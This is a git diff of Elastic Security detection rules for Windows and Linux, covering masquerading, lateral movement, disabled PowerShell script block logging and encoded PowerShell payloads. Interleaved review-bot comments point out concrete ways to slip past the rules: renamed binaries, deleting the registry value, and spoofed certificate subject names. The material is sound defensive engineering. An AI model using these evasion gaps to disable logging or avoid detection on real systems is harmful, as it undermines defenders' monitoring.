"required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "80084fa9-8677-4453-8680-b891d3c0c778", + "setup": "## Setup\n\nThis rule requires the use of the `auditd_manager` integration. 
`Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "low", + "tags": [ + "Data Source: Auditd Manager", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 106 + }, + "id": "80084fa9-8677-4453-8680-b891d3c0c778_106", + "type": "security-rule" +} \ No newline at end 
of file
diff --git a/packages/security_detection_engine/kibana/security_rule/800e01be-a7a4-46d0-8de9-69f3c9582b44_3.json b/packages/security_detection_engine/kibana/security_rule/800e01be-a7a4-46d0-8de9-69f3c9582b44_3.json
new file mode 100644
index 00000000000..2fb950fafcf
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/800e01be-a7a4-46d0-8de9-69f3c9582b44_3.json
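Review bot: The exclusion added to the query, `not process.name:(grep or python* or chef-client)`, is keyed on process.name alone, a value the process itself controls — a binary renamed or copied to `grep` or `python3` reads /proc/modules without ever surfacing as a new term, and `python*` also exempts every script executed by a Python interpreter rather than just the intended tooling. Since `process.executable` is already one of the new-terms fields, the exception would be tighter scoped by executable path (the distribution's grep and python locations) and, for chef-client, by the service account it runs as, rather than by bare name. The `-w /proc/ -p r -k audit_proc` watch in the setup text is unchanged from the preceding 105 file; it records every read under /proc, so the volume it generates is worth calling out in that text.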
@@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies processes running with unusual extensions that are not typically valid for Windows executables.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Process Extension", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.executable : \"?*\" and \n not process.name : (\"*.exe\", \"*.com\", \"*.scr\", \"*.tmp\", \"*.dat\") and\n not process.executable : \n (\n \"MemCompression\",\n \"Registry\",\n \"vmmem\",\n \"vmmemWSL\",\n \"?:\\\\Program Files\\\\Dell\\\\SupportAssistAgent\\\\*.p5x\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\com.docker.service\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Intel\\\\AGS\\\\Libs\\\\AGSRunner.bin\"\n ) and\n not (\n (process.name : \"C9632CF058AE4321B6B0B5EA39B710FE\" and process.code_signature.subject_name == \"Dell Inc\") or\n (process.name : \"*.upd\" and process.code_signature.subject_name == \"Bloomberg LP\") or\n (process.name: \"FD552E21-686E-413C-931D-3B82A9D29F3B\" and process.code_signature.subject_name: \"Adobe Inc.\") or\n (process.name: \"3B91051C-AE82-43C9-BCEF-0309CD2DD9EB\" and process.code_signature.subject_name: \"McAfee, LLC\") or\n (process.name: \"soffice.bin\" and process.code_signature.subject_name: \"The Document Foundation\") or\n (process.name: (\"VeeamVixProxy_*\", \"{????????-????-????-????-????????????}\") and process.code_signature.subject_name: \"Veeam Software Group GmbH\") or\n (process.name: \"1cv8p64.bin\" and process.code_signature.subject_name: \"LLC 1C-Soft\") or\n (process.name: \"AGSRunner.bin\" and process.code_signature.subject_name: \"Intel Corporation\")\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": 
"event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "800e01be-a7a4-46d0-8de9-69f3c9582b44", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.008", + "name": "Masquerade File Type", + "reference": "https://attack.mitre.org/techniques/T1036/008/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "800e01be-a7a4-46d0-8de9-69f3c9582b44_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/814d96c7-2068-42aa-ba8e-fe0ddd565e2e_3.json b/packages/security_detection_engine/kibana/security_rule/814d96c7-2068-42aa-ba8e-fe0ddd565e2e_3.json new file mode 100644 index 00000000000..7e068d842d1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/814d96c7-2068-42aa-ba8e-fe0ddd565e2e_3.json 
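Review bot: The signer-based exceptions in the query (the `process.code_signature.subject_name == "Dell Inc"` arm and the arms that follow it) check only the subject name, not whether the signature validates, so a binary carrying an untrusted or self-issued certificate with the same subject string satisfies the exception; each arm should also require `process.code_signature.trusted == true`, e.g. `(process.name : "*.upd" and process.code_signature.subject_name == "Bloomberg LP" and process.code_signature.trusted == true)`, and `process.code_signature.trusted` would then need an entry in required_fields. The arms also mix `==` (case-sensitive in EQL) with `:` (case-insensitive) on the same subject_name field, so "Dell Inc" and "Adobe Inc." are compared under different rules; one operator for all of them would make the intent clear.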
@@ -0,0 +1,61 @@
+{
+ "attributes": {
+ "anomaly_threshold": 70,
+ "author": [
+ "Elastic"
+ ],
+ "description": "An anomaly detection job has detected a remote file transfer with a rare extension, which could indicate potential lateral movement activity on the host.",
+ "from": "now-90m",
+ "interval": "15m",
+ "license": "Elastic License v2",
+ "machine_learning_job_id": "lmd_rare_file_extension_remote_transfer",
+ "name": "Unusual Remote File Extension",
+ "references": [
+ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html",
+ "https://docs.elastic.co/en/integrations/lmd",
+ "https://www.elastic.co/blog/detecting-lateral-movement-activity-a-new-kibana-integration",
+ "https://www.elastic.co/blog/remote-desktop-protocol-connections-elastic-security"
+ ],
+ "related_integrations": [
+ {
+ "package": "lmd",
+ "version": "^2.0.0"
+ },
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ }
+ ],
+ "risk_score": 21,
+ "rule_id": "814d96c7-2068-42aa-ba8e-fe0ddd565e2e",
+ "setup": "## Setup\n\nThe rule requires the Lateral Movement Detection integration assets to be installed, as well as file and Windows RDP process events collected by the Elastic Defend integration. \n\n### Lateral Movement Detection Setup\nThe Lateral Movement Detection integration detects lateral movement activity by identifying abnormalities in file and Windows RDP events. Anomalies are detected using Elastic's Anomaly Detection feature.\n\n#### Prerequisite Requirements:\n- Fleet is required for Lateral Movement Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- File events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Lateral Movement Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Lateral Movement Detection and select the integration to see more details about it.\n- Under Settings, click Install Lateral Movement Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Lateral Movement Detection, you'll need to enable the corresponding Anomaly Detection jobs.\n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your file events. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/lmd/kibana/ml_module/lmd-ml.json) configuration file, you will see a card for Lateral Movement Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n",
+ "severity": "low",
+ "tags": [
+ "Use Case: Lateral Movement Detection",
+ "Rule Type: ML",
+ "Rule Type: Machine Learning",
+ "Tactic: Lateral Movement"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0008",
+ "name": "Lateral Movement",
+ "reference": "https://attack.mitre.org/tactics/TA0008/"
+ },
+ "technique": [
+ {
+ "id": "T1210",
+ "name": "Exploitation of Remote Services",
+ "reference": "https://attack.mitre.org/techniques/T1210/"
+ }
+ ]
+ }
+ ],
+ "type": "machine_learning",
+ "version": 3
+ },
+ "id": "814d96c7-2068-42aa-ba8e-fe0ddd565e2e_3",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_108.json b/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_108.json
new file mode 100644
index 00000000000..c8cdde4a0e5
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_108.json
@@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to disable PowerShell Script Block Logging via registry modification. Attackers may disable this logging to conceal their activities in the host and evade detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "PowerShell Script Block Logging Disabled", + "note": "## Triage and analysis\n\n### Investigating PowerShell Script Block Logging Disabled\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making it available in various environments and creating an attractive way for attackers to execute code.\n\nPowerShell Script Block Logging is a feature of PowerShell that records the content of all script blocks that it processes, giving defenders visibility of PowerShell scripts and sequences of executed commands.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense for the user to use PowerShell to complete tasks.\n- Investigate if PowerShell scripts were run after logging was disabled.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\"\n ) and registry.data.strings : (\"0\", \"0x00000000\")\n", + "references": [ + "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScriptBlockLogging" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "818e23e6-2094-4f0e-8c01-22d30f3506c6", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + 
"reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.002", + "name": "Disable Windows Event Logging", + "reference": "https://attack.mitre.org/techniques/T1562/002/" + } + ] + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "818e23e6-2094-4f0e-8c01-22d30f3506c6_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_109.json b/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_109.json new file mode 100644 index 00000000000..29d6fde274e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_109.json 
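Review bot: The query only matches `event.type == "change"` with `registry.data.strings : ("0", "0x00000000")`, so removing the EnableScriptBlockLogging value (or its parent ScriptBlockLogging key), which turns logging off just as effectively because the feature defaults to off, produces no alert; an additional clause for `event.type == "deletion"` on the same `registry.path` values would close that gap. The path list is also HKLM-only, and PowerShell appears to honor the equivalent policy under HKCU\SOFTWARE\Policies as well — worth confirming and, if so, adding the user-hive variants. The 109 file of this same rule carries the identical query, so both points apply there too.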
@@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to disable PowerShell Script Block Logging via registry modification. Attackers may disable this logging to conceal their activities in the host and evade detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "PowerShell Script Block Logging Disabled", + "note": "## Triage and analysis\n\n### Investigating PowerShell Script Block Logging Disabled\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making it available in various environments and creating an attractive way for attackers to execute code.\n\nPowerShell Script Block Logging is a feature of PowerShell that records the content of all script blocks that it processes, giving defenders visibility of PowerShell scripts and sequences of executed commands.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense for the user to use PowerShell to complete tasks.\n- Investigate if PowerShell scripts were run after logging was disabled.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\"\n ) and registry.data.strings : (\"0\", \"0x00000000\")\n", + "references": [ + "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScriptBlockLogging" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "818e23e6-2094-4f0e-8c01-22d30f3506c6", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + 
"reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.002", + "name": "Disable Windows Event Logging", + "reference": "https://attack.mitre.org/techniques/T1562/002/" + } + ] + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "818e23e6-2094-4f0e-8c01-22d30f3506c6_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_111.json b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_111.json new file mode 100644 index 00000000000..51dbcb8825c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_111.json 
@@ -0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of .NET functionality for decompression and base64 decoding combined in PowerShell scripts, which malware and security tools heavily use to deobfuscate payloads and load them directly in memory to bypass defenses.", + "false_positives": [ + "Legitimate PowerShell Scripts which makes use of compression and encoding." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Suspicious Payload Encoded and Compressed", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"System.IO.Compression.DeflateStream\" or\n \"System.IO.Compression.GzipStream\" or\n \"IO.Compression.DeflateStream\" or\n \"IO.Compression.GzipStream\"\n ) and\n FromBase64String\n ) and\n not file.path: ?\\:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows?Defender?Advanced?Threat?Protection\\\\\\\\Downloads\\\\\\\\* and\n not user.id : \"S-1-5-18\"\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "81fe9dc6-a2d7-4192-a2d8-eed98afc766a", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging 
(Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 111 + }, + "id": "81fe9dc6-a2d7-4192-a2d8-eed98afc766a_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_211.json b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_211.json new file mode 100644 index 00000000000..bbf9afe583e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_211.json 
